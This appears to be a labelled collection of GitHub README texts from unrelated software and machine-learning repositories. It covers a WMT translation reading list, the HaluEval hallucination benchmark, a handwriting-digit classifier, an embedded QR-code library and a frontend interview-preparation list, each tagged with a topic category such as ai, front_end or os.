1902 and en de http matrix statmt org matrix systems list 1909 microsoft system report yingce xia xu tan fei tian fei gao di he weicong chen yang fan linyuan gong yichong leng renqian luo yiren wang lijun wu jinhua
zhu tao qin and tie yan liu 2019 microsoft research asia s systems for wmt19 http www statmt org wmt19 pdf wmt0048 pdf in proceedings of the fourth conference on machine translation shared task papers news microsoft research asia msra leads in 2019 wmt international machine translation competition https news microsoft com apac 2019 05 22 microsoft research asia msra leads in 2019 wmt international machine translation competition techniques yiren wang yingce xia tianyu he fei tian tao qin chengxiang zhai and tie yan liu 2019 multi agent dual learning https openreview net pdf id hyghn2a5tm in proceedings of iclr 2019 kaitao song xu tan tao qin jianfeng lu and tie yan liu 2019 mass masked sequence to sequence pre training for language generation https arxiv org pdf 1905 02450 in proceedings of icml 2019 renqian luo fei tian tao qin enhong chen and tie yan liu 2018 neural architecture optimization https papers nips cc paper 8007 neural architecture optimization pdf in proceedings of neurips 2018 jinhua zhu fei gao lijun wu yingce xia tao qin wengang zhou xueqi cheng tie yan liu 2019 soft contextual data augmentation for neural machine translation https arxiv org pdf 1905 10523 pdf in proceedings of acl 2019 the winner of en zh http matrix statmt org matrix systems list 1908 patech system report coming soon techniques transformer back translation reranking ensemble h3 id wmt18 wmt 2018 h3 the winner of zh en http matrix statmt org matrix systems list 1892 tencent system report mingxuan wang li gong wenhuan zhu jun xie and chao bian 2018 tencent neural machine translation systems for wmt18 https www aclweb org anthology w18 6429 in proceedings of the third conference on machine translation shared task papers techniques rnmt transformer bpe rerank ensemble outputs with 48 features including t2t r2l t2t l2r rnn l2r rnn r2l etc back translation joint train with english to chinese systems fine tuning with selected data knowledge distillation the winner of en zh http matrix 
statmt org matrix systems list 1893 gtcom system report chao bei hao zong yiming wang baoyong fan shiqi li and conghu yuan 2018 an empirical study of machine translation for the shared task of wmt18 https www aclweb org anthology w18 6404 in proceedings of the third conference on machine translation shared task papers techniques transformer back translation data filtering by rules language models and translation models bpe greedy ensemble decoding fine tuning with newstest2017 back translation the winner of de en http matrix statmt org matrix systems list 1880 rwth aachen university system report julian schamper jan rosendahl parnia bahar yunsu kim arne nix and hermann ney 2018 the rwth aachen university supervised machine translation systems for wmt 2018 https www aclweb org anthology w18 6426 in proceedings of the third conference on machine translation shared task papers techniques ensemble of 3 strongest transformer models data selection bpe fine tuning important hyperparameters batch size and model dimension the winner of en de http matrix statmt org matrix systems list 1881 microsoft system report marcin junczys dowmunt 2018 microsoft s submission to the wmt2018 news translation task how i learned to stop worrying and love the data https www aclweb org anthology w18 6415 in proceedings of the third conference on machine translation shared task papers techniques marian transformer big bpe ensemble data filtering domain weighted paracrawl original data decoder time ensemble with in domain transformer style language model reranking with right to left transformer big models h3 id wmt17 wmt 2017 h3 the winner of zh en http matrix statmt org matrix systems list 1878 sogou system report yuguang wang shanbo cheng liyang jiang jiajun yang wei chen muze li lin shi yanfeng wang and hongtao yang 2017 sogou neural machine translation systems for wmt17 https www aclweb org anthology w17 4742 in proceedings of the second conference on machine translation shared task papers 
techniques encoder decoder with attention bpe reranking r2l t2s n gram language models tagging model name entity translation ensemble the winner of en zh http matrix statmt org matrix systems list 1879 de en http matrix statmt org matrix systems list 1868 and en de http matrix statmt org matrix systems list 1869 university of edinburgh system report rico sennrich alexandra birch anna currey ulrich germann barry haddow kenneth heafield antonio valerio miceli barone and philip williams 2017 the university of edinburgh s neural mt systems for wmt17 https www aclweb org anthology w17 4739 in proceedings of the second conference on machine translation shared task papers techniques encoder decoder with attention deep model layer normalization weight tying back translation bpe reranking l2r r2l ensemble h3 id wmt16 wmt 2016 h3 the winner of de en http matrix statmt org matrix systems list 1846 university of regensburg system report failed to find it techniques failed to find it the winner of en de http matrix statmt org matrix systems list 1846 university of edinburgh system report edinburgh neural machine translation systems for wmt 16 http www aclweb org anthology w16 2323 in proceedings of the first conference on machine translation shared task papers techniques encoder decoder with attention back translation bpe reranking r2l ensemble
machine-translation reading-list
ai
Computer-Vision-Face-Recognition-Quick-Starter-in-Python
computer vision face recognition quick starter in python computer vision face recognition quick starter in python video published by packt
ai
storyquest
storyquest this is storyquest a game book development platform complete with a web based editor a mobile client and an e reader export story editor screenshots combined jpg raw true story editor it is a feature rich web based development suite and mobile client for mobile augmented books with storyquest you can create adventure e books and interactive fiction that contain branching storylines audio images illustrations video and interactive javascript based content storyquest delivers ready to deploy app archives for various platforms including ios android chromeos and can export books for e readers like kindle or kobo story client screenshots client combined jpg raw true story client storyquest is currently in development and has reached beta stage feel free to comment or try caution documentation is somewhat sparse at the moment we re working on this building running and usage see the storyquest wiki https github com michaelkleinhenz storyquest wiki for instructions on how to build and run storyquest and on how to create gamebooks with the platform license storyquest copyright © 2016 questor gmbh berlin permission is hereby granted free of charge to any person obtaining a copy of this software and associated documentation files the software to deal in the software without restriction including without limitation the rights to use copy modify merge publish distribute sublicense and or sell copies of the software and to permit persons to whom the software is furnished to do so subject to the following conditions the above copyright notice and this permission notice shall be included in all copies or substantial portions of the software the software is provided as is without warranty of any kind express or implied including but not limited to the warranties of merchantability fitness for a particular purpose and noninfringement in no event shall the authors or copyright holders be liable for any claim damages or other liability whether in an action of contract
tort or otherwise arising from out of or in connection with the software or the use or other dealings in the software
front_end
5LN708
code for machine learning in natural language processing 5ln708 this repo contains material i ve written for the course machine learning in natural language processing 7 5 ects 5ln708 at uppsala university the code here is not intended to be a full course on its own but a place where i publish code shown in the lectures some exercises and notebooks for the assignments enrolled students can find slides etc at https uppsala instructure com courses 74791
ai
Frontend-Interview-Preparation-for-Interns-and-Junior-Developers
frontend interview preparation for interns junior developers click if you like this repository pull requests are highly appreciated please contribute your interview preparation notes here special thanks to those whose contributions have been shared here and those who are contributing here img src https i ibb co dvvgxnt 1635604147457 jpg height 100 width 35 interview preparation process decoding the front end interview process dev to https dev to emmabostian decoding the front end interview process 14dl how to prepare for frontend developer interviews workat tech https workat tech frontend development article prepare for frontend developer interview sblagrzufdx3 cracking the front end interview freecodecamp org https www freecodecamp org news cracking the front end interview 9a34cd46237 how to prepare for software engineering interview youtube com https youtu be dcfshecnkw8 how to write a resume of a software engineer youtube com https youtu be elgk9nrtyss how to write a cover letter of a web developer zety com https zety com blog web developer cover letter example html css basic practice revision html w3schools com https www w3schools com html default asp revision css w3schools com https www w3schools com css default asp responsive web design freecodecamp org https www freecodecamp org learn responsive web design basic html css interview questions youtube com https youtu be cswc4hgmjcm html css top questions answers top 50 html interview q a edureka co https www edureka co blog interview questions top 50 html interview questions and answers top 50 css interview q a edureka co https www edureka co blog interview questions css interview questions most html interview q a interviewbit com https www interviewbit com html interview questions most css interview q a interviewbit com https www interviewbit com css interview questions top 55 html interview q a fullstack cafe https www fullstack cafe interview questions html5 top 50 css interview q a fullstack cafe https www 
fullstack cafe interview questions css javascript basic practice revision javascript w3schools com https www w3schools com js default asp hands on javascript zonayed js org https zonayed js org recap javascript core concepts youtube com https youtube com playlist list plhiz4m8vcp9nflbo9a0pzulscg xc7dkq recap modern javascript es6 concepts youtube com https www youtube com playlist list plhiz4m8vcp9mfjmrp9eehwkarbi0wdgxg javascript technical interview series youtube com https www youtube com playlist list plwgdquzwnop0vvqpvpa3ccqtjpllpwtn8 advanced theoretical javascript codedamn com https codedamn com learn advanced theoritical js cheatsheets of javascript codecademy com https www codecademy com learn introduction to javascript modules learn javascript introduction cheatsheet javascript top questions answers top 50 javascript interview q a edureka co https www edureka co blog interview questions javascript interview questions most asked 100 javascript interview q a hashnode dev https alimammiya hashnode dev 100 most asked javascript interview questions and answers part 1 top 145 javascript interview q a fullstack cafe https www fullstack cafe interview questions javascript top 10 javascript interview q a medium com https javascript plainenglish io top 10 javascript interview questions 9343421fe4e2 10 most asked es6 interview q a geeksforgeeks org https www geeksforgeeks org 10 most asked es6 interview questions answers for developers most javascript interview q a interviewbit com https www interviewbit com javascript interview questions javascript interview questions answers github com https github com sudheerj javascript interview questions javascript interview handbook q a frontendinterviewhandbook com https frontendinterviewhandbook com en javascript questions react js basic practice revision react js w3schools com https www w3schools com react default asp recap react js core concepts youtube com https www youtube com playlist list 
plhiz4m8vcp9m6hvqv7a36cp8lkzyhiepr react interview questions scrimba com https scrimba com learn reactinterview front end development libraries freecodecamp org https www freecodecamp org learn front end libraries 11 advanced react interview questions medium com https tapajyoti bose medium com 11 advanced react interview questions you should absolutely know with detailed answers e306083ecb7d cheatsheets of react js codecademy com https www codecademy com learn react 101 modules react 101 jsx u cheatsheet react js top questions answers top 50 react js interview q a edureka co https www edureka co blog interview questions react interview questions top 155 react js interview q a fullstack cafe https www fullstack cafe interview questions react 21 essential react js interview q a toptal com https www toptal com react interview questions 7 most asked react js interview q a geeksforgeeks org https www geeksforgeeks org 7 most asked reactjs interview questions answers most react js interview q a interviewbit com https www interviewbit com react interview questions react js interview questions answers github com https github com sudheerj reactjs interview questions top 4 mistakes in react interviews dev to https dev to andyrewlee top 4 mistakes in react interviews b4i frontend interview questions answers 100 front end interview questions challenge udemy com https www udemy com course 100 front end interview questions challenge 50 common front end developer interview q a fullstack cafe https www fullstack cafe blog front end developer interview questions list of front end interview q a frontendmasters com https frontendmasters com books front end handbook 2018 practice interview q html interview question answers for front end developer thatjsdude com https thatjsdude com interview clearing your front end job interview javascript codeburst io https codeburst io clearing your front end job interview javascript d5ec896adda4 front end developer interview questions github com 
https github com h5bp front end developer interview questions technical interviewing for front end engineers frontendmasters com https frontendmasters com courses interviewing frontend interview questions for web development codedamn com https codedamn com learn web development interview frontend interview cheatsheet itnext io https itnext io frontend interview cheatsheet that helped me to get offer on amazon and linkedin cba9584e33c7 amazon front end engineer interview prep github com https github com senayyakut amazon front end engineer interview prep backend interview questions answers top 50 node js interview q a edureka co https www edureka co blog interview questions top node js interview questions 2016 most 25 node js interview q a guru99 com https www guru99 com node js interview questions html most asked node js interview q a interviewbit com https www interviewbit com node js interview questions top 20 mongodb interview q a guru99 com https www guru99 com mongodb interview questions html 66 mern stack interview q a fullstack cafe https www fullstack cafe blog mern stack interview questions crack your mern interview with these questions dev to https dev to commentme crack your mern interview with these questions 3ji3 computer science interview questions answers recap object oriented programming core concepts youtube com https www youtube com playlist list pl xxuzqn0xvcqnhqtxzs9lbenrmg4ajmg four basics of object oriented programming indeed com https www indeed com career advice career development what is object oriented programming recap data structure algorithms core concepts youtube com https www youtube com playlist list plym69wpbtiieoesltwgusvny9hdwbjit revision data structure algorithms programiz com https www programiz com dsa data structure algorithms course with javascript youtube com https www youtube com playlist list pl hlkez9xcsoi5thydzipbj2pedzop7vx 25 essential computer science interview q a educba com https www educba com computer science 
interview questions top 20 computer science interview q a indeed com https www indeed com career advice interviewing computer science interview questions recap 7 most important software design patterns medium com https medium com educative the 7 most important software design patterns d60e546afb0e practice practical technical coding challenges algorithm and data structures problem practice leetcode com https leetcode com front end coding problem practice bigfrontend dev https bigfrontend dev html css javascript problem practice acefrontend com https www acefrontend com css specific problem practice cssbattle dev https cssbattle dev project based problem practice frontendmentor io https www frontendmentor io challenges behavioral interview questions answers traditional behavioural hr interview q a interviewbit com https www interviewbit com hr interview questions 10 behavioral interview q a for software engineers indeed com https www indeed com career advice interviewing software engineer behavioral interview questions top 8 behavioral interview questions and answers careerkarma https careerkarma com blog behavioral interview questions 45 behavioral q a during non technical interview devskiller com https devskiller com 45 behavioral questions to use during non technical interview with developers mock interview examples front end mock technical interview youtube com https youtu be vomucmmonye mock react job interview youtube com https youtu be zv373vas4um mock interview junior developer youtube com https youtu be eo7sl1byxoe mock interview mid level react js dev youtube com https youtu be clzywfmuc 0 mock live software engineering coding interview youtube com https youtu be hqdtpgsiqvg reactjs interview playlist reactjs javascript frontend youtube com https www youtube com playlist list plqbfzb0lw6gdyaqlvsgkkunqzgx4chyn0 interview experience recruitment stories unacademy interview experience rajatgupta xyz https rajatgupta xyz unacademy interview recruitment process 
at brain station 23 tahanima github io https tahanima github io 2020 06 21 recruitment stories experience of proteeti at bs23 recruitment process at newscred tahanima github io https tahanima github io 2021 02 17 recruitment stories experience of tahmid at newscred recruitment process at selise tahanima github io https tahanima github io 2021 05 21 recruitment stories experience of subhashis at selise recruitment process at cefalo tahanima github io https tahanima github io 2021 05 03 recruitment stories experience of asma at cefalo recruitment process at shopup tahanima github io https tahanima github io 2020 12 25 recruitment stories experience of fahad at shopup recruitment process at kona software lab tahanima github io https tahanima github io 2021 04 02 recruitment stories experience of montaser at kona recruitment process at relisource tahanima github io https tahanima github io 2020 12 10 recruitment stories experience of khairul at relisource recruitment process at enosis tahanima github io https tahanima github io 2020 06 25 recruitment stories experience of sabera at enosis recruitment process at infolytx tahanima github io https tahanima github io 2020 05 09 recruitment stories experience of jaber at infolytx recruitment process at dynamic solution innovators tahanima github io https tahanima github io 2020 06 15 recruitment stories experience of afrida at dsi contributing contributions are always welcome see contributing md for ways to get started please adhere to this project s code of conduct
frontend-interview interview-preparation frontend-interview-questions frontend-webdevelopment html-css-javascript html-interview-questions css-interview-questions javascript-interview-questions react-interview-questions interview javascript interview-questions computer-science front-end
front_end
FPGA_design_course1
fpga design course1 project completed during the course an introduction to fpga design for embedded systems this is part of a course on coursera please adhere to the honor code
os
HaluEval
halueval a hallucination evaluation benchmark for llms this is the repo for our paper halueval a large scale hallucination evaluation benchmark for large language models https arxiv org abs 2305 11747 the repo contains the 35k data data release used for evaluating the llm the code for generating the data data generation process the code for evaluating the model evaluation the code for analyzing the model analysis overview halueval includes 5 000 general user queries with chatgpt responses and 30 000 task specific examples from three tasks i e question answering knowledge grounded dialogue and text summarization for general user queries we adopt the 52k instruction tuning dataset from alpaca https github com tatsu lab stanford alpaca to further screen user queries where llms are most likely to produce hallucinations we use chatgpt to sample three responses for each query and finally retain the queries with low similarity responses for human labeling furthermore for the task specific examples in halueval we design an automatic approach to generate hallucinated samples first based on existing task datasets e g hotpotqa as seed data we design task specific instructions for chatgpt to generate hallucinated samples in two methods i e one pass and conversational second to select the most plausible and difficult hallucinated sample for llms evaluation we elaborate the filtering instruction enhanced by ground truth examples and leverage chatgpt for sample selection a href https github com rucaibox halueval target blank img src assets pipeline png alt halueval style width 90 min width 300px display block margin auto a data release the directory data data contains 35k generated and human annotated hallucinated samples we used in our experiments there are four json files as follows qa data json data qa data json 10k hallucinated samples for qa based on hotpotqa https hotpotqa github io as seed data for each sample dictionary the fields knowledge question and right answer refer 
to the knowledge from wikipedia question text and ground truth answer collected from hotpotqa the field hallucinated answer is the generated hallucinated answer correspondingly dialogue data json data dialogue data json 10k hallucinated samples for dialogue based on opendialkg https github com facebookresearch opendialkg as seed data for each sample dictionary the fields knowledge dialogue history and right response refer to the knowledge from wikipedia dialogue history and ground truth response collected from opendialkg the field hallucinated response is the generated hallucinated response correspondingly summarization data json data summarization data json 10k hallucinated samples for summarization based on cnn daily mail https github com abisee cnn dailymail as seed data for each sample dictionary the fields document and right summary refer to the document and ground truth summary collected from cnn daily mail the field hallucinated summary is the generated hallucinated summary correspondingly general data json data general data json 5k human annotated samples for chatgpt responses to general user queries from alpaca https github com tatsu lab stanford alpaca for each sample dictionary the fields user query chatgpt response and hallucination label refer to the posed user query chatgpt response and hallucination label yes no annotated by humans based on these data you can evaluate the ability of llms to recognize hallucinations and analyze what type of contents topics llms tend to hallucinate or fail to recognize the contained hallucination data generation process we executed the data generation pipeline via chatgpt according to the following steps first we download the training sets of hotpotqa opendialkg and cnn daily mail cd generation wget http curtis ml cmu edu datasets hotpot hotpot train v1 1 json wget https raw githubusercontent com facebookresearch opendialkg main data opendialkg csv wget https huggingface co datasets ccdv cnn dailymail blob main cnn 
stories tgz second we sample 10k samples and generate their hallucinated counterparts by setting the task and sampling strategy seed data the downloaded training sets of hotpotqa opendialkg and cnn daily mail task sampled tasks i e qa dialogue or summarization strategy sampling strategy i e one turn or multi turn one pass and conversational in our paper python generate py seed data hotpot train v1 1 json task qa strategy one turn finally we select the most plausible and difficult hallucinated sample from these two sampling methods the final selected samples will be stored in the data directory task filtered task i e qa dialogue or summarization python filtering py task qa users can use our provided instructions and codes on their own datasets to generate hallucinated samples evaluation in evaluation we randomly sample a ground truth or a hallucinated output for each data for example if the text is a hallucinated answer the llm should recognize the hallucination and output yes which means the text contains hallucinations if the text is a ground truth answer the llm should output no indicating that there is no hallucination task evaluated task i e qa dialogue or summarization model evaluated model e g chatgpt gpt 3 5 turbo gpt 3 davinci cd evaluation python evaluate py task qa model gpt 3 5 turbo analysis based on the samples that llms succeed or fail to recognize we can analyze the topics of these samples using lda task analyzed task i e qa dialogue or summarization result the file of recognition results at the evaluation stage category all all task samples failed task samples that llms fail to recognize hallucinations cd analysis python analyze py task qa result evaluation qa qa gpt 3 5 turbo result json category all license halueval uses mit license license reference please cite the repo if you use the data or code in this repo misc halueval author junyi li and xiaoxue cheng and wayne xin zhao and jian yun nie and ji rong wen title halueval a large scale 
hallucination evaluation benchmark for large language models year 2023 journal arxiv preprint arxiv 2305 11747 url https arxiv org abs 2305 11747
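Based on the field descriptions above, the released QA samples can be turned into yes/no recognition inputs as described in the evaluation section. The sketch below is only an illustration: the exact JSON keys (`knowledge`, `question`, `right_answer`, `hallucinated_answer`) and the prompt wording are assumptions inferred from the README; check the repo's `evaluation` code for the real format.

```python
import json
import random

def build_prompt(sample, use_hallucinated):
    """Build one yes/no hallucination-recognition input from a QA sample.

    If the hallucinated answer is shown, the expected model output is "Yes"
    (the text contains hallucination); for the ground-truth answer it is "No".
    """
    answer = sample["hallucinated_answer"] if use_hallucinated else sample["right_answer"]
    label = "Yes" if use_hallucinated else "No"
    prompt = (
        "#Knowledge#: {k}\n#Question#: {q}\n#Answer#: {a}\n"
        "Does the answer contain hallucination? Answer Yes or No."
    ).format(k=sample["knowledge"], q=sample["question"], a=answer)
    return prompt, label

def load_samples(path, seed=0):
    """Load qa_data.json and, per sample, randomly pick either the ground-truth
    or the hallucinated answer, mirroring the random sampling in the evaluation."""
    with open(path) as f:
        data = json.load(f)
    rng = random.Random(seed)
    return [build_prompt(s, rng.random() < 0.5) for s in data]
```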
ai
esp-qrcode
esp qrcode library for esp open rtos https github com superhouse esp open rtos for qr code generation c char mydata http example com qrcode qrcode uint8 t qrcodebytes malloc qrcode getbuffersize qrcode version qrcode inittext qrcode qrcodebytes qrcode version ecc medium mydata qrcode print qrcode print on console free qrcodebytes license mit licensed see the bundled license https github com maximkulkin esp qrcode blob master license file for more details
os
AppDevelopmentCourse_Projects
appdevelopmentcourse projects material for the ios dev lab in engineering school unam based on everyone can code
os
azure-ml
azure machine learning training resources around azure ml https www surveymonkey com r qt7pdht how to use this site this site is intended to be the main resource to an instructor led course but anyone is welcome to learn here the intent is to make this site self guided and it is getting there we recommend cloning this repository onto your local computer with a git based program like github desktop for windows or you may download the site contents as a zip file by going to clone or download at the upper right of this repository modules covered the goal of this course is to cover the following modules ml 101 data science process supervised vs unsupervised vs semisupervised learning dimensionality reduction building ml experiments using studio evaluation of ml models customizing ml experiments inside studio deploying ml as a service for instructor led we recommend downloading the site contents or cloning it if you can do so to your local computer follow along with the classroom instructions and training sessions when there is a lab indicated you may find the lab instructions in the labs folder for self study we recommend downloading the site contents or cloning it if you can do so to your local computer go to decks folder and follow along with the slides when there is a lab indicated you may find the lab instructions in the labs folder structure of this repository site labs hands on exercises decks classroom slides code scripts
machine-learning azure-machine-learning data-science
ai
Move-To-Mobile-Web
move to mobile web mobile web development wiki amp guide guide list traditional fe mobile fe html meta https github com hongru move to mobile web wiki html meta html link css border box https github com hongru move to mobile web wiki css e8 87 aa e9 80 82 e5 ba 94 e5 b8 83 e5 b1 80 border box e7 9a 84 e5 ba 94 e7 94 a8 css background size padding https github com hongru move to mobile web wiki css background size padding e7 9a 84 e4 bd bf e7 94 a8 css media queries https github com hongru move to mobile web wiki media queries css transition animation touch scrolling https github com hongru move to mobile web wiki css transition 7canimation 7coverflow scrolling css ratina https github com hongru move to mobile web wiki retina e7 9a 84 e9 80 82 e9 85 8d js mobile features touch events history deviceratio deviceoritation localstorage devicemotion standalone https github com hongru move to mobile web wiki e3 80 90mobile web e3 80 91js features webapp opoa backbone kissy mobile webapp webapp mvc mvp image css image css mobile web performance experience http click vs touchstart overflow scrolling transition vs style gesture bugs araw dev wiki mobile web test debug chrome macbook safari iphone xcode simulator host more mobile web native js bridge js binding mobile performance charles mtl mf size css css css js combo js cdn mt mtop manifest iconfont css js 302 userid
front_end
dt-ios-core
dreamteam core ios what this is the set of extensions frames sources and other things that could be useful in ios app development this repository will be really helpful in mvvm architecture because it contains bindable property wrapper buttonframe inputframe and other frames tiny view models abstractions of ui controls base and bindable classes boilerplates for your projects router implementation how see the exampleapp examples readme md project for getting help with start working with this library the example includes some basic things how to work with a collection and searching elements inside how to work with text fields and validation requirements ios 12 0 xcode 10 2 swift 5 installation swift package manager the swift package manager https swift org package manager is a tool for automating the distribution of swift code and is integrated into the swift compiler it is in early development but dt core ios does support its use on supported platforms once you have your swift package set up adding dt core ios as a dependency is as easy as adding it to the dependencies value of your package swift swift dependencies package url https github com dreamteammobile dt ios core git branch master cocoapods pod dtcore pod dtcorecomponents license dt core ios is released under the mit license see license license for details
front_end
Handwriting-Number-Classification
# Handwriting-Number-Classification

A computer vision project, based on the CImg library and SVM training, to classify handwritten numbers.

## 1. Project requirement

### 1.1 Input
A photo in which an A4 paper is placed on a desk, with some handwritten numbers on it.

### 1.2 Output
A string of the numbers written on the paper, like `70026548853`.

### 1.3 Intermediate processes
- Rectify the paper in the photo into a standard A4 paper.
- Implement segmentation of the numbers, dividing them into single digits.
- Use AdaBoost or SVM to train a classifier for the handwritten numbers.
- Classify the handwritten numbers with the trained classifier.

## 2. Coding environment & 3rd-party libraries

- Windows 10, VS2015, C++
- [CImg library](http://www.cimg.eu/)
- OpenCV, for extracting features of images
- [libsvm](http://www.csie.ntu.edu.tw/~cjlin/libsvm/), for training, testing, and predicting

## 3. Implementation procedure

1. Find the 4 vertices of the paper.
2. Rectify the paper into a standard A4 paper.
3. Segment the numbers, in order:
   - Convert into a binary image.
   - Use a vertical histogram to divide the source image into sub-images, each containing a line of numbers.
   - Use a horizontal histogram to divide each line sub-image into several row sub-images.
   - For each sub-image, apply dilation to thicken the digits and join the broken ones.
   - For each sub-image, use the [connected-component labeling algorithm](https://en.wikipedia.org/wiki/Connected-component_labeling) to isolate single digits.
   - Save all single-digit images, plus a list of their names, in a txt file.
4. Use libsvm to train a model, then test and finally predict the numbers:
   - Data preparing: convert the [MNIST](http://yann.lecun.com/exdb/mnist/) binary data into jpg images, along with their labels.
   - Model training: extract the HOG features of each image and write them in SVM format to a txt file; scale the features with `svm-scale.exe` (search the Windows folder); train the model with `svm-train.exe` to get a model file.
   - Optional: test the data with `svm-predict.exe` and see the accuracy; modify the training parameters to get the highest accuracy.
   - Number predicting: read the digit images you segmented just now and do prediction with the trained model.

## 4. Result screenshots

- 4 vertices of the paper, and A4 paper rectification: ![](https://github.com/markmohr/handwritingnumberclassification/raw/master/resultscreenshots/1.png)
- Segmentation of the numbers (binary image with dilation, divided image, circled single numbers): ![](https://github.com/markmohr/handwritingnumberclassification/raw/master/resultscreenshots/2.png) ![](https://github.com/markmohr/handwritingnumberclassification/raw/master/resultscreenshots/4_dividingimg.png)
- Divided into single numbers, in order, as well as an image list in txt: ![](https://github.com/markmohr/handwritingnumberclassification/raw/master/resultscreenshots/imagelist.png)
- Prediction: ![](https://github.com/markmohr/handwritingnumberclassification/raw/master/resultscreenshots/predict.png)

## 5. Some key points

### 5.1 Joining broken numbers

Comparison (before joining vs. after joining): ![](https://github.com/markmohr/handwritingnumberclassification/raw/master/resultscreenshots/jointhebrokens.png)

Implementation: use the filters below when doing the dilation during number segmentation.

![](https://github.com/markmohr/handwritingnumberclassification/raw/master/resultscreenshots/filter1.png) (filterA) ![](https://github.com/markmohr/handwritingnumberclassification/raw/master/resultscreenshots/filter2.png) (filterB)

Do the dilation with filterA twice at first, and then with filterB once. filterB means: at a white pixel, search one pixel up/down and one pixel left/right; if a black pixel is met, set the current position to black. filterA means: at a white pixel, search one pixel up/down and two pixels left/right, counting the blacks with coefficient 1 or -1 (-1 means subtracting one black when meeting a black on the left/right side); at last, only if the black count is more than 0, set the current position to black.

Obviously filterB thickens the number in all directions, with the downside that the holes in the digits 0, 6, 8, 9 will be filled. So I propose another simple but useful filter, filterA, to deal with this problem: the intensity of a white pixel is made to depend mostly on its horizontal neighbors, which prevents hole filling to some extent. Luckily, it works well in my experiments.

## 6. Code and algorithm explanation

1. [Segmentation of the numbers & broken-number joining](http://blog.csdn.net/qq_33000225/article/details/73123880) (Chinese version)
2. Prediction: waiting.

## 7. Problems left

1. Some numbers are connected to each other and are segmented together into one image.
2. From the prediction result above, we see that most of the 7s and 9s are classified into 1.
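The vertical/horizontal histogram segmentation described above can be sketched independently of the project's C++/CImg code. This TypeScript illustration (function name and signature are my own) projects ink counts onto one axis and splits a binary image into runs wherever the projection histogram drops below a threshold:

```typescript
// Projection-histogram segmentation sketch: given a binary image
// (1 = ink, 0 = background) as an array of rows, return [start, end)
// index ranges along the chosen axis where ink is present.
function splitByHistogram(
  img: number[][],
  byColumns: boolean, // true: split into digits; false: split into lines
  minPixels = 1
): Array<[number, number]> {
  const hist: number[] = byColumns
    ? img[0].map((_, c) => img.reduce((s, row) => s + row[c], 0)) // per-column sums
    : img.map((row) => row.reduce((s, v) => s + v, 0)); // per-row sums

  const runs: Array<[number, number]> = [];
  let start: number | null = null;
  hist.forEach((v, i) => {
    if (v >= minPixels && start === null) {
      start = i; // ink run begins
    } else if (v < minPixels && start !== null) {
      runs.push([start, i]); // ink run ends
      start = null;
    }
  });
  if (start !== null) runs.push([start, hist.length]);
  return runs;
}
```

Applying it with `byColumns = false` yields the line bands; re-applying it to each band with `byColumns = true` yields candidate digit boxes, which is the two-pass scheme the procedure above describes (the dilation and connected-component steps then handle broken and touching strokes).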
cimg svm handwriting-numbers handwritten-digit-recognition handwritten-text-recognition
ai
oca-fw-chibios
# oca-fw-chibios

[![Build Status](https://travis-ci.org/open-canalyzer/oca-fw-chibios.svg?branch=master)](https://travis-ci.org/open-canalyzer/oca-fw-chibios)

Open CANalyzer firmware, based on the ChibiOS RTOS.

## OpenOCD & GDB

OpenOCD and GDB are used for development and debugging:

```sh
scripts/openocd.sh > /dev/null &
arm-none-eabi-gdb --command scripts/openocd
```

The OpenOCD board configuration is `oca-v1.cfg`.
openocd chibios-rtos can can-bus stm32 chibios nanopb usb
os
204321-204361-Project-Server
# plan-g server

## Purpose

This project is meant for the 204321 and 204361 classes.

## What it's about

This project lets CS students track their grades and immediately contact an advisor when they feel like they are about to be retired (forced to withdraw).

## Members

- Juthaporn Simmalee (600510537): documentation
- Patteera Thisri (600510566): documentation
- Phumdol Lookthipnapha (600510569): full stack
- Poomrapee Chaiprasop (600510570): frontend

## Tech stack

https://stackshare.io/beam41/y3-project

## How to start the development server

1. (First time only) Type `npm install` in bash or cmd to install the node modules used in the project.
2. If `.env` does not exist, create it with these settings:
   - `PORT`: any port you like
   - `SECRET`: secret used by JWT to generate tokens
   - `TIMEOUT`: JWT token timeout
   - `DB`: name of the DB file
   - `REGURL`: the URL of the reg API server
3. Start the server with `npm start`. Note: this command is for development, not production.
4. If the main DB does not exist, it will be auto-generated.
   1. To populate the database with the dummy API, start the dummy server first with `npm run start-dummy`, then set `REGURL=http://localhost:9999` in `.env`.
   2. To populate the database with a real API, just put the API path in `REGURL`. The API should use HTTP method GET. The `users` path should send a body like this:
      ```
      {
        "type": "string ('adv' or 'std')",
        "id": "string",
        "name": "string",
        "surname": "string",
        "password": "string"
      }
      ```
      The `plans` path should send a body like this:
      ```
      {
        "id": "string (student id)",
        "plans": [{
          "courseid": "string",
          "year": number,
          "term": number (1, 2 or 3),
          "grade": "string (uppercase, like 'B')"
        }]
      }
      ```
      The `courses` path should send a body like this:
      ```
      {
        "courseid": "string",
        "coursename": "string",
        "coursecredit": number
      }
      ```
   3. Open something that can fire HTTP requests, like [Postman](https://www.getpostman.com/), and fire POST requests to `<server url>/request/courses`, `<server url>/request/users`, and `<server url>/request/plans`.
5. The server is now ready to use at the port you chose.

## How to build and serve the production server

1. Build first with `npm run build`.
2. Serve the server with `npm run serve`.

Note: this file is for development, and it's very big. For the distribution branch, please visit [here](https://github.com/beam41/204321-204361-Project-Server/tree/distribution). For the frontend source code, please visit [here](https://github.com/khunpoom/204321-204361-Project-Client).
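As an illustration of the request bodies this README documents, here is a small TypeScript sketch that assembles the three seed POST requests. The base URL and all field values are invented for the example, and the function is not part of the project:

```typescript
// Illustrative only: builds the three seed requests fired in step 4.3,
// with bodies shaped as documented in this README. All values are made up.
type SeedRequest = { url: string; body: Record<string, unknown> };

function buildSeedRequests(baseUrl: string): SeedRequest[] {
  return [
    {
      // users: one record per advisor ("adv") or student ("std")
      url: `${baseUrl}/request/users`,
      body: { type: "std", id: "600510000", name: "Somchai", surname: "Example", password: "hunter2" },
    },
    {
      // plans: a student's course plan entries
      url: `${baseUrl}/request/plans`,
      body: { id: "600510000", plans: [{ courseid: "204321", year: 3, term: 1, grade: "B" }] },
    },
    {
      // courses: the course catalogue
      url: `${baseUrl}/request/courses`,
      body: { courseid: "204321", coursename: "Example Course", coursecredit: 3 },
    },
  ];
}
```

Each entry could then be POSTed with any HTTP client (Postman, curl, `fetch`) as JSON.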
server
awesome-llm-list
# Large Language Models (LLMs)

The world of large language models (LLMs) is complex and varied. This resource collates together the things that matter, helping to make sense of this increasingly important topic.

## Contents

- [LLM Chat](#llm-chat)
- [Research Papers](#research-papers)
- [Education](#education)
- [Benchmarks](#benchmarks)
- [Leaderboards](#leaderboards)
- [Open Source Models](#open-source-models)
- [Commercial Models](#commercial-models)

## LLM Chat

Everyone knows ChatGPT, but do you know these others?

- [OpenAI ChatGPT](https://chat.openai.com)
- [Google Bard](https://bard.google.com)
